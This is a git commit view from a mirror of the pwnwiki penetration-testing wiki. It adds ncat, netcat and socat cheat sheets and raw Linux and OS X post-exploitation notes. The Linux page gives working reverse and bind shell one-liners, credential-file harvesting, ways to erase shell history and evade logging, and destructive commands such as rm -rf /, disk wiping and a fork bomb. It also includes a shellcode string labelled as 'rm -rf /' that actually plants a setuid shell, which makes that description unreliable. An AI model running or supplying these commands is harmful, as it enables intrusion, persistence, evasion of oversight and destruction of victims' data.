weyne/pwnwiki.github.io
1
0
Fork 0
mirror of https://github.com/oXis/pwnwiki.github.io.git synced 2025-10-29 16:56:59 +00:00
Code Issues Packages Projects Releases Wiki Activity

first whack at nav reorg

Browse Source
This commit is contained in:
Rob Fuller
2013-12-26 13:08:13 -05:00
parent 68644fefb7
commit be072ead31
45 changed files with 110 additions and 148 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
2besorted/bash.md Normal file
View File

@@ -0,0 +1,3 @@
# Place Holder
Content coming. Feel free to submit ;-)

23
2besorted/cats/ncat.md Normal file
View File

@@ -0,0 +1,23 @@
# Ncat Usage
`ncat` similar to the venerable `netcat`, is a command-line or shell application that can be used for a wide variety of exploitation matters including transferring files, establishing remote shells and more! The official ncat site is http://nmap.org/ncat/.
The examples below are mostly copied from the http://nmap.org/book/ncat-man-examples.html page or http://www.irongeek.com/i.php?page=videos/ncat-nmap-netcat and are not a complete listing of all the examples.
## Commands
| Command | Description / Importance |
| -------- | ------------------------ |
| `ncat example.org 8080` | Connect to example.org on TCP port 8080. |
| `ncat -l 8080` | Listen for connections on TCP port 8080. |
| `ncat --sh-exec "ncat example.org 80" -l 8080 --keep-open` | Redirect TCP port 8080 on the local machine to host on port 80. |
| `ncat --exec "/bin/bash" -l 8081 --keep-open` | Bind to TCP port 8081 and attach /bin/bash for the world to access freely. |
| `ncat --exec "/bin/bash" --max-conns 3 --allow \`<br>`192.168.0.0/24 -l 8081 --keep-open` | Bind a shell to TCP port 8081, limit access to hosts on a local network, and limit the maximum number of simultaneous connections to 3. |
| `ncat -l --proxy-type http localhost 8888` | Create an HTTP proxy server on localhost port 8888. |
| `Server: ncat ClientIP 9899 < inputfile`<br>`Client: ncat -l 9899 > outputfile` | Send a file over TCP port 9899 from Server to Client. Server "pushes" the file to the Client. |
| `Server: ncat -l 9899 < inputfile`<br>`Client: ncat ServerIP 9899 > outputfile` | Transfer in the other direction, turning Ncat into a "one file" server. Client "pulls" file from the Server. |
| `echo -e "GET / HTTP/1.0\n\n"`&#124;`ncat google.com 80` | Retrieve the HTML source code of the web server at google.com on TCP port 80. |
| `ncat -t example.org 23` | Connect to example.org's telnet server on TCP port 23. |
| `Server: ncat -l 74 --udp`<br>`Client: ncat --udp localhost 74 < inputfile` | Transfer file from client to server over UDP. |
| `Server: ncat -l 74 --chat`<br>`Client1: ncat localhost 74`<br>`Client2: ncat localhost 74`| Simple chat. |
| `Server: ncat -l --ssl 74 --send-only < inputfile`<br>`Client: ncat localhost 74 --ssl > outputfile` | Transfer file from server to client using SSL encryption. |
| `ncat -l localhost 80 --sh-exec "ncat google.com 80 -o text.txt -x hex.txt"` | Ncat relay |

26
2besorted/cats/netcat.md Normal file
View File

@@ -0,0 +1,26 @@
# Netcat Usage
`netcat` is a command-line or shell application that can be used for a wide variety of exploitation matters including transferring files, establishing remote shells and more! The official netcat site is http://netcat.sourceforge.net and, although Sourceforge has this repository, most Unix/Linux operating systems have a netcat application that is/can be installed via their packagers (apt-get, ports, etc.).
The [SANS Institute](http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf) has a very good "Cheat Sheet" PDF for netcat commands and functions. Please **note** that "All syntax is designed for the original netcat versions, released by Hobbit and Weld Pond. The syntax here can be adapted for other netcats." So, you may need to modify the commands below. Please do check out their PDF.
## Relays on Linux
Before you do any of the Linux relays with netcat below, please do the following:
``$ cd /tmp``
``$ mknod backpipe p``
## Commands
| Command | Category | Description / Importance |
| -------- | -------- | ------------------------ |
| `C:\> nc -l -p [LocalPort] -e relay.bat` <br> `C:\> echo nc [TargetIPaddr] [port] > relay.bat` | Relay - Windows | **Listener-to-Client Relay** - Create a relay that sends packets from the local port [LocalPort] to a netcat client connected to [TargetIPaddr] on port [port] |
| `$ nc -l -p [LocalPort] 0<backpipe` &#124; `nc [TargetIPaddr] [port]` &#124; `tee backpipe` | Relay - Linux | **Listener-to-Client Relay** - Create a relay that sends packets from the local port [LocalPort] to a netcat client connected to [TargetIPaddr] on port [port] |
| `C:\> echo nc -l -p [LocalPort_2] > relay.bat`<br>`C:\> nc -l -p [LocalPort_1] -e relay.bat` | Relay - Windows | **Listener-to-Listener Relay** - Create a relay that will send packets from any connection on {LocalPort_1] to any connection on [LocalPort_2] |
| `$ nc -l -p [LocalPort_1] 0<backpipe` &#124; `nc -l -p [LocalPort_2]` &#124; `tee backpipe` | Relay - Linux | **Listener-to-Listener Relay** - Create a relay that will send packets from any connection on {LocalPort_1] to any connection on [LocalPort_2] |
| `C:\> echo nc [NextHopIPaddr] [port2] > relay.bat`<br>`C:\> nc [PreviousHopIPaddr] [port] -e relay.bat` | Relay - Windows | **Client-to-Client Relay** - Create a relay that will send packets from the connection to [PreviousHopIPaddr] on port [port] to a Netcat Client connected to [NextHopIPaddr] on port [port2] |
| `$ nc [PreviousHopIPaddr] [port] 0<backpipe` &#124; `nc [NextHopIPaddr] [port2]` &#124; `tee backpipe` | Relay - Linux | **Client-to-Client Relay** - Create a relay that will send packets from the connection to [PreviousHopIPaddr] on port [port] to a Netcat Client connected to [NextHopIPaddr] on port [port2] |
| **Server:** `nc -w3 [TargetIPaddr] [port] < [infile]`<br>**Client:** `nc -l -p [LocalPort] > [outfile]` | File Transfer - All OS | Push [infile] to [TargetIPaddr] on [port] |
| **Server:** `nc -l -p [LocalPort] < [infile]`<br>**Client:** `nc -w3 [TargetIPaddr] [port] > [outfile]` | File Transfer - All OS | Connect to [TargetIPaddr] on [port] and retrieve [outfile] |
| `echo ""` &#124; `nc -v -n -w1 [TargetIPaddr] [start_port] [end_port]` | TCP Banner Grabber | Attempt to connect to each port in a range from [end_port] to [start_port] on [TargetIPaddr]. Then send a blank string to the open port and print out any banner received in response. |
| `nc -v -n -z -w1 [TargetIPaddr] [start_port] [end_port]` | TCP Port Scanner | Attempt to connect to each port in a range from [end_port] tp [start_port] on IP address [TargetIPaddr]. |
| `$ nc -l -p [LocalPort] -e /bin/bash` | Backdoor - Linux | Listening backdoor shell for a Linux computer. Use a netcat client to connect to the target's IP address on the [LocalPort] and you will get a BASH shell. |
| `$ nc -l -p [LocalPort] -e cmd.exe` | Backdoor - Windows | Listening backdoor shell for a Windows computer. Use a netcat client to connect to the target's IP address on the [LocalPort] and you will get a CMD shell. |

31
2besorted/cats/socat.md Normal file
View File

@@ -0,0 +1,31 @@
# socat Usage
`socat` or SOcket CAT, similar to the venerable `netcat`, is a command-line or shell application that can be used for a wide variety of exploitation matters including transferring files, establishing remote shells, SSL transport, IPv6 networking and more! The official socat site is http://www.dest-unreach.org/socat/.
An important piece to understand about `socat` is that the format of the command is: `socat [options] <address> <address>` where `<address>` is in a special format. Check out the docs here http://www.dest-unreach.org/socat/doc/socat.html#ADDRESS_TYPES for more information.
The examples below are mostly copied from the http://www.dest-unreach.org/socat/doc/socat.html#EXAMPLES page or http://stuff.mit.edu/afs/sipb/machine/penguin-lust/src/socat-1.7.1.2/EXAMPLES and are not a complete listing of all the examples.
## Commands
| Command | Description / Importance |
| -------- | ------------------------ |
| `socat - TCP4:www.domain.org:80` | Transfers data between STDIO (-) and a TCP4 connection to port 80 of host www.domain.org. This example results in an interactive connection similar to telnet or netcat. The stdin terminal parameters are not changed, so you may close the relay with ^D or abort it with ^C. |
| `socat -d -d READLINE,history=$HOME/.http_history \`<br>`TCP4:www.domain.org:www,crnl` | This is similar to the previous example, but you can edit the current line in a bash like manner (READLINE) and use the history file .http_history; socat prints messages about progress (-d -d). The port is specified by service name (www), and correct network line termination characters (crnl) instead of NL are used. |
| `socat TCP4-LISTEN:www TCP4:www.domain.org:www` | Installs a simple TCP port forwarder. With TCP4-LISTEN it listens on local port "www" until a connection comes in, accepts it, then connects to the remote host (TCP4) and starts data transfer. It will not accept a second connection. |
| `socat -d -d -lmlocal2 TCP4-LISTEN:80,bind=myaddr1, \`<br>`su=nobody,fork,range=10.0.0.0/8,reuseaddr \`<br>`TCP4:www.domain.org:80,bind=myaddr2` | TCP port forwarder, each side bound to another local IP address (bind). This example handles an almost arbitrary number of parallel or consecutive connections by fork'ing a new process after each accept() . It provides a little security by su'ing to user nobody after forking; it only permits connections from the private 10 network (range); due to reuseaddr, it allows immediate restart after master process's termination, even if some child sockets are not completely shut down. With -lmlocal2, socat logs to stderr until successfully reaching the accept loop. Further logging is directed to syslog with facility local2. |
| `socat TCP4-LISTEN:5555,fork,tcpwrap=script \`<br>`EXEC:/bin/myscript,chroot=/home/sandbox,su-d=sandbox,pty,stderr` | A simple server that accepts connections (TCP4-LISTEN) and fork's a new child process for each connection; every child acts as single relay. The client must match the rules for daemon process name "script" in /etc/hosts.allow and /etc/hosts.deny, otherwise it is refused access (see "man 5 hosts_access"). For EXEC'uting the program, the child process chroot's to /home/sandbox, su's to user sandbox, and then starts the program /home/sandbox/bin/myscript. Socat and myscript communicate via a pseudo tty (pty); myscript's stderr is redirected to stdout, so its error messages are transferred via socat to the connected client. |
| `socat EXEC:"mail.sh target@domain.com",fdin=3,fdout=4 \`<br>`TCP4:mail.relay.org:25,crnl,bind=alias1.server.org,mss=512` | mail.sh is a shell script, distributed with socat, that implements a simple SMTP client. It is programmed to "speak" SMTP on its FDs 3 (in) and 4 (out). The fdin and fdout options tell socat to use these FDs for communication with the program. Because mail.sh inherits stdin and stdout while socat does not use them, the script can read a mail body from stdin. Socat makes alias1 your local source address (bind), cares for correct network line termination (crnl) and sends at most 512 data bytes per packet (mss). |
| `socat -,raw,echo=0,escape=0x0f /dev/ttyS0,raw,echo=0,crnl` | Opens an interactive connection via the serial line, e.g. for talking with a modem. Raw and echo set the console's and ttyS0's terminal parameters to practicable values, crnl converts to correct newline characters. Escape allows to terminate the socat process with character control-O. Consider using READLINE instead of the first address. |
| `socat UNIX-LISTEN:/tmp/.X11-unix/X1,fork \`<br>`SOCKS4:host.victim.org:127.0.0.1:6000,socksuser=nobody,sourceport=20` | With UNIX-LISTEN, socat opens a listening UNIX domain socket /tmp/.X11-unix/X1. This path corresponds to local XWindow display :1 on your machine, so XWindow client connections to DISPLAY=:1 are accepted. Socat then speaks with the SOCKS4 server host.victim.org that might permit sourceport 20 based connections due to an FTP related weakness in its static IP filters. Socat pretends to be invoked by socksuser nobody, and requests to be connected to loopback port 6000 (only weak sockd configurations will allow this). So we get a connection to the victims XWindow server and, if it does not require MIT cookies or Kerberos authentication, we can start work. Please note that there can only be one connection at a time, because TCP can establish only one session with a given set of addresses and ports. |
| `socat -u /tmp/readdata,seek-end=0,ignoreeof -` | This is an example for unidirectional data transfer (-u). Socat transfers data from file /tmp/readdata (implicit address GOPEN), starting at its current end (seek-end=0 lets socat start reading at current end of file; use seek=0 or no seek option to first read the existing data) in a "tail -f" like mode (ignoreeof). The "file" might also be a listening UNIX domain socket (do not use a seek option then). |
| `(sleep 5; echo PASSWORD; sleep 5; echo ls; sleep 1)` &#124; <br>`socat - EXEC:'ssh -l user server',pty,setsid,ctty` | EXEC'utes an ssh session to server. Uses a pty for communication between socat and ssh, makes it ssh's controlling tty (ctty), and makes this pty the owner of a new process group (setsid), so ssh accepts the password from socat. |
| `socat -u TCP4-LISTEN:3334,reuseaddr,fork \`<br>`OPEN:/tmp/in.log,creat,append` | Implements a simple network based message collector. For each client connecting to port 3334, a new child process is generated (option fork). All data sent by the clients are appended to the file /tmp/in.log. If the file does not exist, socat creates it. Option reuseaddr allows immediate restart of the server process. |
| `socat READLINE,noecho='[Pp]assword:' \`<br>`EXEC:'ftp ftp.server.com',pty,setsid,ctty` | Wraps a command line history (READLINE) around the EXEC'uted ftp client utility. This allows editing and reuse of FTP commands for relatively comfortable browsing through the ftp directory hierarchy. The password is echoed! pty is required to have ftp issue a prompt. Nevertheless, there may occur some confusion with the password and FTP prompts. |
| `socat TCP4-LISTEN:2022,reuseaddr,fork \`<br>`PROXY:proxy:www.domain.org:22,proxyport=3128,proxyauth=user:pass` | Starts a forwarder that accepts connections on port 2022, and directs them through the proxy daemon listening on port 3128 (proxyport) on host proxy, using the CONNECT method, where they are authenticated as "user" with "pass" (proxyauth). The proxy should establish connections to host www.domain.org on port 22 then. |
| `socat - SSL:server:4443,cafile=server.crt,cert=client.pem` | An OpenSSL client that tries to establish a secure connection to an SSL server. Option cafile specifies a file that contains trust certificates: we trust the server only when it presents one of these certificates and proofs that it owns the related private key. Otherwise the connection is terminated. With cert a file containing the client certificate and the associated private key is specified. This is required in case the server wishes a client authentication; many Internet servers do not. The first address ('-') can be replaced by almost any other socat address. |
| `socat SSL-LISTEN:4443,reuseaddr,pf=ip4,fork,\`<br>`cert=server.pem,cafile=client.crt PIPE` | An OpenSSL server that accepts TCP connections, presents the certificate from the file server.pem and forces the client to present a certificate that is verified against cafile.crt. The second address ('PIPE') can be replaced by almost any other socat address. For instructions on generating and distributing OpenSSL keys and certificates see the additional socat document socat-openssl.txt. |
| `socat tcp-l:7777,reuseaddr,fork system:'filan -i 0 -s >&2',nofork` | Listens for incoming TCP connections on port 7777. For each accepted connection, invokes a shell. This shell has its stdin and stdout directly connected to the TCP socket (nofork). The shell starts filan and lets it print the socket addresses to stderr (your terminal window). |
| `socat - tcp:www.blackhat.org:31337,readbytes=1000` | Connects to an unknown service and prevents being flooded. |
| `socat TCP:host2:4443 TUN:192.168.255.1/24,up` | Establishes one side of a virtual (but not private!) network with host2 where a similar process might run, with UDP-L and tun address 192.168.255.2. They can reach each other using the addresses 192.168.255.1 and 192.168.255.2. Note that streaming eg. via TCP or SSL does not guarantee to retain packet boundaries and may thus cause packet loss. |
| `socat TCP-LISTEN:80,reuseaddr,fork,su=nobody \`<br>`TCP:www.dmz.mydomain.org:80` | Relay TCP port 80 from everywhere (internet, intranet, dmz) through your firewall to your DMZ webserver (like plug-gw) listen on port 80; whenever a connection is made, fork a new process (parent process keeps accepting connections), su to nobody, and connect to www.dmz.mydomain.org on port 80. Attention: this is a substitute for a reverse proxy without providing application level security. |
| `socat -lm -d -d TCP-LISTEN:25,bind=fw.dmz.mydomain.org, \`<br>`fork,su=nobody,range=smtp.dmz.mydomain.org/32 \`<br>`TCP:smtp.intra.mydomain.org:25` | Relay mail from your DMZ server through your firewall. Accept connections only on dmz interface and allow connections only from smtp.dmz.mydomain.org. The advantages over plug-gw and other relays are: * you can bind to an IP address (even an alias), therefore enhance security * in your OS you can create several IP aliases and bind another socat daemon to each, making several application servers addressable * lots of options, like switching user, chroot, IP performance tuning * no need for inetd. |

331
2besorted/gdoc_linux.md Normal file
View File

@@ -0,0 +1,331 @@
# Linux Google Doc Content #
The content below is the raw data from the Google Doc that was first used to collect it. Over time, this content will be moved into sub-pages and organized but is placed here, now, so as to be more complete. We apologize for its appearance.
----
## System
| Command | Description / Importance |
| ------- | ------------------------ |
| `uname -a` | Prints the kernel version, arch, sometimes distro, ... |
| `ps aux` | List all running processes |
| `top -n 1 -d` | Print process, 1 is a number of lines |
| `id` | Your current username, groups |
| `arch, uname -m` | Kernel processor architecture |
| `w` | who is connected, uptime and load avg |
| `who -a` | uptime, runlevel, tty, proceses etc. |
| `gcc -v` | Returns the version of GCC. |
| `mysql --version` | Returns the version of MySQL. |
| `perl -v` | Returns the version of Perl. |
| `ruby -v` | Returns the version of Ruby. |
| `python --version` | Returns the version of Python. |
| `df -k` | mounted fs, size, % use, dev and mount point |
| `mount` | mounted fs |
| `last -a` | Last users logged on |
| `lastcomm` | |
| `lastlog` | |
| `lastlogin (BSD)` | |
| `getenforce` | Get the status of SELinux (Enforcing, Permissive or Disabled) |
| `dmesg` | Informations from the last system boot |
| `lspci` | prints all PCI buses and devices |
| `lsusb` | prints all USB buses and devices/h |
| `lscpu` | prints CPU information |
| `lshw` | |
| `ex` | |
| `cat /proc/cpuinfo` | |
| `cat /proc/meminfo` | |
| `du -h --max-depth=1 /` | (note: can cause heavy disk i/o) |
| `which nmap` | locate a command (ie nmap or nc) |
| `locate bin/nmap` | |
| `locate bin/nc` | |
| `jps -l` | |
| `java -version` | Returns the version of Java. |
## Networking
hostname -f
ip addr show
ip ro show
ifconfig -a
route -n
cat /etc/network/interfaces
iptables -L -n -v
iptables -t nat -L -n -v
ip6tables -L -n -v
iptables-save
netstat -anop
netstat -r
netstat -nltupw (root with raw sockets)
arp -a
lsof -nPi
to resume it ? "cat /proc/net/*" (more discreet)
what does the above mean? -> It means that all the information given by the above commands can be found by looking into the files under /proc/net , and that this approach is less likely to trigger monitoring or other stuff.
User accounts
local accounts: cat /etc/passwd
password hashes in /etc/shadow on Linux
password hashes in /etc/security/passwd on AIX
groups in /etc/group (and/or /etc/gshadow on Linux)
all accounts: getent passwd
should dump local, LDAP, NIS, whatever the system is using
same with getent group
Samba's own database: pdbedit -L -w or pdbedit -L -v
privileged accounts: cat
(above: cat ???)
mail aliases: cat /etc/aliases find /etc -name aliases, getent aliases
NIS accounts: ypcat passwd - displays NIS password file
Credentials
SSH keys, often passwordless: /home/*/.ssh/id*
SSH agent:
Kerberos tickets: /tmp/krb5cc_*, /tmp/krb5.keytab
PGP keys: /home/*/.gnupg/secring.gpgs
Configs
ls -aRl /etc/ | awk '$1 ~ /w.$/' | grep -v lrwx 2>/dev/nullte
cat /etc/issue{,.net}
cat /etc/master.passwd
cat /etc/group
cat /etc/hosts
cat /etc/crontab
cat /etc/sysctl.conf
for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done # (Lists all crons)
cat /etc/resolv.conf
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.confcda
cat /etc/inetd.conf
cat /opt/lampp/etc/httpd.conf
cat /etc/samba/smb.conf
cat /etc/openldap/ldap.conf
cat /etc/ldap/ldap.conf
cat /etc/exports
cat /etc/auto.master
cat /etc/auto_master
cat /etc/fstab
find /etc/sysconfig/ -type f -exec cat {} \;
Determine Distro
lsb_release -d # Generic command for all LSB distros
/etc/os-release # Generic for distros using "systemd"
/etc/issue # Generic but often modified
cat /etc/*release
/etc/SUSE-release # Novell SUSE
/etc/redhat-release, /etc/redhat_version # Red Hat
/etc/fedora-release # Fedora
/etc/slackware-release, /etc/slackware-version # Slackware
/etc/debian_release, /etc/debian_version # Debian
/etc/mandrake-release # Mandrake
/etc/sun-release # Sun JDS
/etc/release # Solaris/Sparc
/etc/gentoo-release # Gentoo
/etc/arch-release # Arch Linux (file will be empty)
arch # OpenBSD; sample: "OpenBSD.amd64"
uname -a # often hints at it pretty well
Installed Packages
rpm -qa --last | head
yum list | grep installed
Debian: dpkg -l
dpkg -l | grep -i "linux-image"
dpkg --get-selections
{Free,Net}BSD: pkg_info
Solaris: pkginfo
Gentoo: # equery must be installed
cd /var/db/pkg/ && ls -d */* # always works
Arch Linux: pacman -Q
Package Sources
cat /etc/apt/sources.list
ls -l /etc/yum.repos.d/
cat /etc/yum.conf
Finding Important Files
ls -dlR */ #
ls -alR | grep ^d
find /var -type d
ls -dl `find /var -type d`
ls -dl `find /var -type d` | grep -v root
find /var ! -user root -type d -ls
find /var/log -type f -exec ls -la {} \;
find / -perm -4000 (find all suid files)
ls -alhtr /mnt
ls -alhtr /media
ls -alhtr /tmp
ls -alhtr /home
cd /home/; treels /home/*/.ssh/*
find /home -type f -iname '.*history'
ls -lart /etc/rc.d/
locate tar | grep [.]tar$ # Remember to updatedb before running locate
locate tgz | grep [.]tgz$
locate sql | grep [.]sql$
locate settings | grep [.]php$
locate config.inc | grep [.]php$
ls /home/*/id*
.properties | grep [.]properties # java config files
locate .xml | grep [.]xml # java/.net config files
find /sbin /usr/sbin /opt /lib `echo $PATH | 'sed s/:/ /g'` -perm /6000 -ls # find suids
locate rhosts
Covering Your Tracks
Avoiding history filesmys
export HISTFILE=
or
unset HISTFILE
This next one might not be a good idea, because a lot of folks know to check for tampering with this file, and will be suspicious if they find out:
However if you happen to be on an account that was originally inaccessible, if the .bash_history file is available (ls -a ~), viewcating its contents can provide you with a good deal of information about the system and its most recent updates/changes.
clear all history in ram
history -c
rm -rf ~/.bash_history && ln -s ~/.bash_history /dev/null (invasive)
touch ~/.bash_history (invasive)
<space> history -c (using a space before a command)
zsh% unset HISTFILE HISTSIZE
tcsh% set history=0
bash$ set +o history
ksh$ unset HISTFILE
find / -type f -exec {} (forensics nightmare)
Note that you're probably better off modifying or temporary disabling rather than deleting history files, it leaves a lot less traces and is less suspect.
In some cases HISTFILE and HISTFILESIZE are made read-only; get around this by explicitly clearing history (history -c) or by kill -9 $$'ing the shell. Sometimes the shell can be configured to run 'history -w' after every command; get around this by overriding 'history' with a no-op shell function. None of this will help if the shell is configured to log everything to syslog, however.
Obtain users' information
ls -alh /home/*/
ls -alh /home/*/.ssh/
cat /home/*/.ssh/authorized_keys
cat /home/*/.ssh/known_hosts
cat /home/*/.*hist* # you can learn a lot from this
find /home/*/.vnc /home/*/.subversion -type f
grep ^ssh /home/*/.*hist*
grep ^telnet `/home/*/.*hist*
grep ^mysql /home/*/.*hist*
cat /home/*/.viminfo
sudo -l # if sudoers is not. readable, this sometimes works per user
crontab -l
cat /home/*/.mysql_history
Escalating
Looking for possible opened paths
ls -alh /root/
sudo -l
cat /etc/sudoers
cat /etc/shadow
cat /etc/master.passwd # OpenBSD
cat /var/spool/cron/crontabs/* | cat /var/spool/cron/*
lsof -nPi
ls /home/*/.ssh/*
Maintaining control
Reverse Shell
Starting list sourced from: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 (No /dev/tcp on older Debians, but use nc, socat, TCL, awk or any interpreter like Python, and so on.).
perl -e 'use Socket; $i="10.0.0.1"; $p=1234; socket(S,PF_INET, SOCK_STREAM, getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){ open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};'
python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(("10.0.0.1",1234)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i; exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' nc -e /bin/sh 10.0.0.1 1234 # note need -l on some versions, and many does NOT support -e anymore
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
xterm -display 10.0.0.1:1se
Listener- Xnest :1
Add permission to connect- xhost +victimIP
ssh -NR 3333:localhost:22 user@yourhost
nc -e /bin/sh 10.0.0.1 1234
Fun if Windows is present and accessible
If there is Windows installed and the logged-in user access level includes those Windows partition, attacker can mount them up and do a much deeper information gathering, credential theft and root-ing. Ntfs-3g is useful for mounting ntfs partitions read-write.
TODO: insert details on what to look for
Stuff to be sorted
## GOING TO MOVE EVERYTHING HERE FOR LEGIBILITY ONCE EDITING DIES DOWN
Command
Output
ps aux
List of running processes
id
List current user and group along with user/group id
w
Show info about who is logged, what are they are doing
who -a
Print information about users
cat /dev/core > /dev/audio
cat /dev/mem > /dev/audio
Makes a sound from the memory content.
Usefulness of this??? (none, aside from pissing off the sysadmin, in the very unlikely case that the server has speakers and the legacy OSS driver)
sudo -p
allows the user to define what the password prompt will be
(useful for fun customization with aliases or shell scripts)
Deleting and Destroying
(If it is necessary to leave the machine inaccessible or unusable)
Note that this tends to be quite evident (as opposed to a simple exploitation that might go unnoticed for some time, even forever), and will most surely get you into troubles.
Oh, and you're probably a jerk if you use any of the stuff below.
Command
Description
rm -rf /
This will recursively try to delete all files.
char esp[] __attribute__ ((section(".text"))) /* e.s.p release */ = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68?
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99?
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7?
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56?
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31?
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69?
"\x6e\x2f\x73\x68\x00\x2d\x63\x00?
"cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";
Hex version of rm -rf /
How is this supposed to work?
mkfs.ext3 /dev/sda
Reformat the device mentioned, making recovery of files hard.
dd if=/dev/zero of=/dev/sda bs=1M
Overwrite disk /dev/sda with zeros
Execute a remote script
wget http://server/file.sh -O- | sh
This command forces the download of a file and immediately its execution, can be exploited easily using or reverse shit
Fork Bomb
:(){:|:&};:
The [in]famous "fork bomb". This command will cause your system to run a large number of processes, until it "hangs". This can often lead to data loss (e.g. if the user brutally reboots, or the OOM killer kills a process with unsaved work). If left alone for enough time a system can eventually recover from a fork bomb.
Stolen from: http://incolumitas.com/wp-content/uploads/2012/12/blackhats_view.pdf
World
writable
directories
Find word writable folders outside your home directory. It would be a tremendous success if we could write, say to /etc. So we could add configuration files and therefore pretty sure execute code as root, since many daemons read a specific number of primary and secondary configuration files, whereas the secondary ones are often not created yet. If the superusers home (/root) would be writable, we could create shell startup files that doesn't exist yet: .profile,
.bash_profile, .bashrc...
find / \( -wholename
'/home/homedir/*' -prune \) -o \
( -type d -perm -0002 \) -exec
ls -ld '{}' ';' 2>/dev/null
World
writable files
What if /etc/passwd would be writable? Yeah, we just could add another root user and we would have won! Whereas the foregoing scenario is just too good to be
true, it really makes sense to search for world writable files outside your own territory (= your home directory).
find / \( -wholename
'/home/homedir/*' -prune -o
-wholename '/proc/*' -prune \)
-o \( -type f -perm -0002 \)
-exec ls -l '{}' ';' 2>/dev/null
Logfiles
Sometimes a security unaware administrator chmods a sensitive log file, because he couldn't view it and therefore leaks potentially sensitive data such as
passwords or other important information.
find /var/log -type f -perm
-0004 2>/dev/null
Setuid / setgid files
We already examined fully why setuid and setgid files are worth to be double checked. Such a file owned by root and susceptible for attacks is a big weakness.
find / \( -type f -or -type d \)
-perm -6000 2>/dev/null

68
2besorted/gdoc_osx.md Normal file
View File

@@ -0,0 +1,68 @@
# OS X Google Doc Content #
The content below is the raw data from the Google Doc that was first used to collect it. Over time, this content will be moved into sub-pages and organized but is placed here, now, so as to be more complete. We apologize for its appearance.
----
## Blind Files
(things to pull when all you can do is blindly read) LFI/dir traversal
/etc/resolv.conf (everyone always has read on this and it wont trigger an IDS)
## System
<code>uname -a
ps aux
ps -aef
id
arch
w
who -a
gcc -v
mysql --version
perl -v
ruby -v
python --version
df -k
mount
last -a
lastlogin (*bsd)
getenforce <- does not work on Lion no idea if this work in previous versions
dmesg
lsusb<- does not work on Lion no idea it this work on previous versions
lshw <- does not work on Lion no idea it this work on previous versions
free -m <- does not work on Lion no idea it this work on previous versions
du -h --max-depth=1 /
which nmap (see if it's already installed)
locate bin/nmap
which nc (see if it's already installed)
locate bin/<whatever you want>
whoami
jps -l
java -version</code>
## Networking
<code>hostname -f
ip addr show
ifconfig -a
route -n
cat /etc/network/interfaces
iptables -L -n
netstat -anop
netstat -r
netstat -nltupw (root with raw sockets)
arp -a
lsof -nPi</code>
## Per User
<code>ls -alh /Users/*/
ls -alh /Users/*/.ssh/
cat /Users/*/.ssh/authorized_keys
cat /Users/*/.ssh/known_hosts
cat /Users/*/.*hist*
find -type f /Users/*/.vnc /Users/*/.subversion
grep ^ssh /Users/*/.*hist*
grep ^telnet `/Users/*/.*hist*
grep ^mysql /Users/*/.*hist*
cat /Users/*/.viminfo
sudo -l # if sudoers is not readable, this sometimes works per user
crontab -l</code>